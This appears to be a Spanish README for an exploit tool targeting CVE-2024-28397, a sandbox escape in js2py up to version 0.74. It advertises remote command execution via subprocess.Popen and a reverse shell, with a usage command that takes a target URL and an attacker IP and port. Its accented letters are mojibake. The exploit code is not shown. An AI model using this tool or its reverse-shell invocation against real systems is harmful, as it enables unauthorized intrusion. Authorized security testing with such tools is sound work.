## https://sploitus.com/exploit?id=494AE353-1C53-5CFC-AAED-53BFF4F22B7F
# js2py Sandbox Escape (CVE-2024-28397)
Exploit para ejecuci贸n remota de comandos (RCE) mediante escape del sandbox
en **js2py <= 0.74**.
Permite ejecutar c贸digo arbitrario en el sistema anfitri贸n a trav茅s de
evaluaci贸n de JavaScript insegura.
---
## Vulnerabilidad
- **CVE**: CVE-2024-28397
- **Componente**: js2py
- **Versiones afectadas**: <= 0.74
- **Impacto**: Remote Code Execution
- **Vector**: JavaScript sandbox escape
- **An谩lisis vulnerabilidad**: [CVE-2024-28397-js2py-Sandbox-Escape](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape)
---
## Caracter铆sticas
- Escape de sandbox
- Ejecuci贸n de comandos v铆a `subprocess.Popen`
- Reverse shell
- Sin dependencias externas en el target
---
## Requisitos
- Python 3.8+
- Acceso a un endpoint vulnerable que eval煤e JS con js2py
Dependencias:
```bash
pip install -r requirements.txt
```
---
## Uso
```bash
python3 exploit.py -U http://target_url -H IP -P PUERTO
```
---
# Advertencia legal
Este proyecto se proporciona 煤nicamente con fines educativos y para
auditor铆as de seguridad autorizadas.
El autor no se hace responsable del uso indebido de esta herramienta.